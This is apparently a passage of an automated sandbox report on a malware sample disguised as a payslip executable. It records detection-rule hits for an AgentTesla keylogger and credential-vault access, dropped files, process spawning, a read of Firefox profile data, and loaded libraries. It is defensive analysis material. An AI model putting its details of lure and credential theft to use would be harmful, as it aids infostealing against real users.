                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_0662B3422_2_0662B342
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_066227102_2_06622710
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_066277B02_2_066277B0
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_0662E4C82_2_0662E4C8
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_06625DF72_2_06625DF7
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_066200402_2_06620040
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeCode function: 2_2_0662003E2_2_0662003E
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_05A1D5E03_2_05A1D5E0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_05A154603_2_05A15460
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_05A167303_2_05A16730
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_05A102B03_2_05A102B0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_05A1F6203_2_05A1F620
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_05A102A03_2_05A102A0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_05A19CE83_2_05A19CE8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_05A19CD73_2_05A19CD7
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_05A18A383_2_05A18A38
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_05A19A493_2_05A19A49
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_05A19A583_2_05A19A58
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_070169D03_2_070169D0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_070127C03_2_070127C0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_070127D03_2_070127D0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_07010C603_2_07010C60
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_07010C703_2_07010C70
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_070114E03_2_070114E0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_070108383_2_07010838
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 3_2_070110A83_2_070110A8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_02984A685_2_02984A68
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_0298E8A05_2_0298E8A0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_02983E505_2_02983E50
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_0298AC805_2_0298AC80
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_029841985_2_02984198
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_068418005_2_06841800
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_06857E985_2_06857E98
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_068556B05_2_068556B0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_068567085_2_06856708
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_068535805_2_06853580
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_068500405_2_06850040
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_06855E105_2_06855E10
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_068577B85_2_068577B8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_0685E4D05_2_0685E4D0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 5_2_068500075_2_06850007
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_06E968D87_2_06E968D8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_06E927C07_2_06E927C0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_06E927D07_2_06E927D0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_06E914E07_2_06E914E0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_06E90C607_2_06E90C60
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_06E90C707_2_06E90C70
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_06E910A87_2_06E910A8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 7_2_06E908387_2_06E90838
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_00FEC5148_2_00FEC514
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_00FEE8A08_2_00FEE8A0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_00FE4A688_2_00FE4A68
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_00FE3E508_2_00FE3E50
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_00FE41988_2_00FE4198
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_06857E988_2_06857E98
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_068556B08_2_068556B0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_068567088_2_06856708
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_068535808_2_06853580
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_068500408_2_06850040
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_068577B88_2_068577B8
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_0685E4D08_2_0685E4D0
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_06855DFF8_2_06855DFF
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 8_2_0685001D8_2_0685001D
                    Source: Payslip_October_2024.exe, 00000000.00000002.1678292611.00000000030A8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename472d0e4f-32a4-4ea2-b137-597340264f0d.exe4 vs Payslip_October_2024.exe
                    Source: Payslip_October_2024.exe, 00000000.00000002.1681687434.000000000B2D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Payslip_October_2024.exe
                    Source: Payslip_October_2024.exe, 00000000.00000002.1677108158.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Payslip_October_2024.exe
                    Source: Payslip_October_2024.exe, 00000000.00000002.1678620012.00000000046BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Payslip_October_2024.exe
                    Source: Payslip_October_2024.exe, 00000000.00000002.1678620012.00000000046BD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename472d0e4f-32a4-4ea2-b137-597340264f0d.exe4 vs Payslip_October_2024.exe
                    Source: Payslip_October_2024.exe, 00000000.00000000.1648226168.0000000000AF6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesPtN.exe. vs Payslip_October_2024.exe
                    Source: Payslip_October_2024.exe, 00000002.00000002.4120007288.00000000007F9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Payslip_October_2024.exe
                    Source: Payslip_October_2024.exeBinary or memory string: OriginalFilenamesPtN.exe. vs Payslip_October_2024.exe
                    Source: Payslip_October_2024.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                    Source: Payslip_October_2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: sgxIb.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, f0FZ3tm1t5LeGCMWQS.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, f0FZ3tm1t5LeGCMWQS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, f0FZ3tm1t5LeGCMWQS.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, JtgxviEHqAVBfiVUqo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, JtgxviEHqAVBfiVUqo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, f0FZ3tm1t5LeGCMWQS.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, f0FZ3tm1t5LeGCMWQS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, f0FZ3tm1t5LeGCMWQS.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.Payslip_October_2024.exe.b2d0000.6.raw.unpack, JtgxviEHqAVBfiVUqo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, f0FZ3tm1t5LeGCMWQS.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, f0FZ3tm1t5LeGCMWQS.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, f0FZ3tm1t5LeGCMWQS.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/4@2/2
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payslip_October_2024.exe.logJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeMutant created: NULL
                    Source: Payslip_October_2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: Payslip_October_2024.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: Payslip_October_2024.exeReversingLabs: Detection: 31%
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeFile read: C:\Users\user\Desktop\Payslip_October_2024.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\Payslip_October_2024.exe "C:\Users\user\Desktop\Payslip_October_2024.exe"
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess created: C:\Users\user\Desktop\Payslip_October_2024.exe "C:\Users\user\Desktop\Payslip_October_2024.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeProcess created: C:\Users\user\Desktop\Payslip_October_2024.exe "C:\Users\user\Desktop\Payslip_October_2024.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeProcess created: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeSection loaded: amsi.dllJump to behavior
